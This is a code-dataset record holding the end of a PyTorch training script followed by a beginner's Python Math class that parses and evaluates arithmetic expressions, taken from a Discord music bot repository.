os.path.join(args.export_dir, f'{args.name}-predictions.csv') pd.DataFrame(np.array(predictions), index=names).to_csv( path, sep=',', index=names, header=False ) path = os.path.join(args.export_dir, f'{args.name}-targets.csv') pd.DataFrame(np.array(export_targets), index=names).to_csv( path, sep=',', index=names, header=False ) took = time.time() - start print(f"Process took {took:.1f}s, avg {took/args.epochs:.1f} s/epoch.") # save hyper parameters to tensorboard for reference hparams = {k: v for k, v in vars(args).items() if v is not None} print(metrics) metrics = { "total_time": took, "avg_time_per_epoch": took/args.epochs } print("writing hparams") train_writer.add_hparams(hparams, metric_dict=metrics, name="hparams") if __name__ == "__main__": try: main() except KeyboardInterrupt: print("Process interrupted by user, emptying cache...") torch.cuda.empty_cache()
23,664
0
23
8dce960a7b6703eb2654296841d98428d993d7fa
6,284
py
Python
classes/Math.py
lekevin42/discord_music_single
fcf30cf33f8bd5b8f2a16dba7f32600024700213
[ "MIT" ]
null
null
null
classes/Math.py
lekevin42/discord_music_single
fcf30cf33f8bd5b8f2a16dba7f32600024700213
[ "MIT" ]
1
2017-07-28T14:51:13.000Z
2017-07-28T20:27:46.000Z
classes/Math.py
lekevin42/discord_music_single
fcf30cf33f8bd5b8f2a16dba7f32600024700213
[ "MIT" ]
null
null
null
import math #def find_par(self): if __name__ == "__main__": main()
20.739274
106
0.60837
import math class Math: def __init__(self, eq): self.equation = eq self.equation_list = None def print_equation(self): print(self.equation) def remove_spaces(self): self.equation = self.equation.replace(" ", "") def split_equation(self): self.equation_list = self.equation.split(" ") def is_operator(self, char): if char is "+" or char is "-" or char is "*" or char is "/": return True else: return False def remove_spaces(self): counter = 0 eq_list = [] #equation = "" length = len(self.equation) for char in self.equation: eq_list.append(char) while eq_list.count(" ") is not 0: if counter is length: counter = 0 if eq_list[counter] is " ": eq_list.pop(counter ) length -= 1 counter += 1 self.equation = "" for char in eq_list: self.equation += char #return equation def check_num(self, num): check = False if num is "(" or num is ")" or num is "+" or num is "-" or num is "*" or num is "/" or num is "^": return False for n in range(0, 10): if num == str(n) or num is ".": return True return False def prep_equation(self): eq_list = [] #equation = "" #print(self.equation) for char in self.equation: eq_list.append(char) counter = 0 #eq_list[counter] is not " " and eq_list[counter + 1] is not " " and # and self.check_num(eq_list[counter]) is False and self.check_num(eq_list[counter + 1]) is not False #print(self.check_num(("."))) #print(self.check_num("1")) while counter is not len(eq_list) - 1: if eq_list[counter] is not " " and eq_list[counter + 1] is not " ": if self.check_num(eq_list[counter]) is True and self.check_num(eq_list[counter + 1]) is True: pass else: eq_list.insert(counter + 1, " ") counter += 1 self.equation = "" for char in eq_list: self.equation += char #print(self.equation) #return equation def find_operators(self, equation_list): add = [] sub = [] mul = [] div = [] left_par = [] right_par = [] pows = [] operator_count = 0 counter = 0 for char in equation_list: if char is "+": add.append(counter) operator_count += 1 elif char is "-": sub.append(counter) operator_count += 1 elif char is "*": mul.append(counter) operator_count += 1 elif char is "/": div.append(counter) operator_count += 1 elif char is "(": left_par.append(counter) elif char is ")": right_par.append(counter) elif char is "^": pows.append(counter) operator_count += 1 counter += 1 #print(add) #print(sub) #print(mul) #print(div) #print(left_par) #print(right_par) #print(equation_list) return add, sub, mul, div, left_par, right_par, pows, operator_count #def find_par(self): def solve_equation(self, equation): add, sub, mul, div, left_par, right_par, pows, operator_count = self.find_operators(equation) #print(add) #print(sub) #print(mul) #print(div) #print(left_par) #print(right_par) #print(operator_count) solved = self.solve(add, sub, mul, div, pows, operator_count, equation) return solved def solve(self, add, sub, mul, div, pows, operator_count, equation): #print(equation) counter = 0 while operator_count is not 0: if len(pows) is not 0: char = "^" counter = pows.pop(0) elif len(mul) is not 0: char = "*" counter = mul.pop(0) elif len(div) is not 0: char = "/" counter = div.pop(0) elif len(add) is not 0: char = "+" counter = add.pop(0) elif len(sub) is not 0: char = "-" counter = sub.pop(0) #print(char) x = equation[counter - 1] y = equation[counter + 1] equation.pop(counter - 1) equation.pop(counter - 1) equation.pop(counter - 1) if char is "+": equation.insert(counter -1, float(x) + float(y)) elif char is "-": equation.insert(counter -1, float(x) - float(y)) elif char is "*": equation.insert(counter -1, float(x) * float(y)) elif char is "/": equation.insert(counter -1, float(x) / float(y)) elif char is "^": equation.insert(counter - 1, pow(float(x), float(y))) while len(add) is not 0: add.pop(0) while len(sub) is not 0: sub.pop(0) while len(mul) is not 0: mul.pop(0) while len(div) is not 0: div.pop(0) while len(pows) is not 0: pows.pop(0) operator_count -= 1 add, sub, mul, div, left_par, right_par, pows, operator_count = self.find_operators(equation) return equation[0] def parse_equation(self): sub_eq = [] in_par = False try: self.remove_spaces() self.prep_equation() self.split_equation() #print(self.equation_list) add, sub, mul, div, left_par, right_par, pows, operator_count = self.find_operators(self.equation_list) while len(left_par) is not 0: for char in self.equation_list: if char is ")": in_par = False break if in_par: sub_eq.append(char) if char is "(": in_par = True solved_sub = self.solve_equation(sub_eq) sub_eq = [] #print(solved_sub) placed = left_par_pos = left_par.pop(0) right_par_pos = right_par.pop(0) while left_par_pos < right_par_pos + 1: #print(self.equation_list) self.equation_list.pop(placed) left_par_pos += 1 self.equation_list.insert(placed, solved_sub) #print(self.equation_list) while len(left_par) is not 0: left_par.pop(0) while len(right_par) is not 0: right_par.pop(0) add, sub, mul, div, left_par, right_par, pow, operator_count = self.find_operators(self.equation_list) #print(self.equation_list) value = self.solve_equation(self.equation_list) if isinstance(value, (int, float)): return(value) #print(equation) # return equation except Exception as error: #print("Please check your equation.") pass def main(): eq = "2.4 + 2.6" #eq = remove_spaces(eq, len(eq)) #equation = prep_equation(eq) math = Math(eq) value = math.parse_equation() print(value) if __name__ == "__main__": main()
5,852
-10
352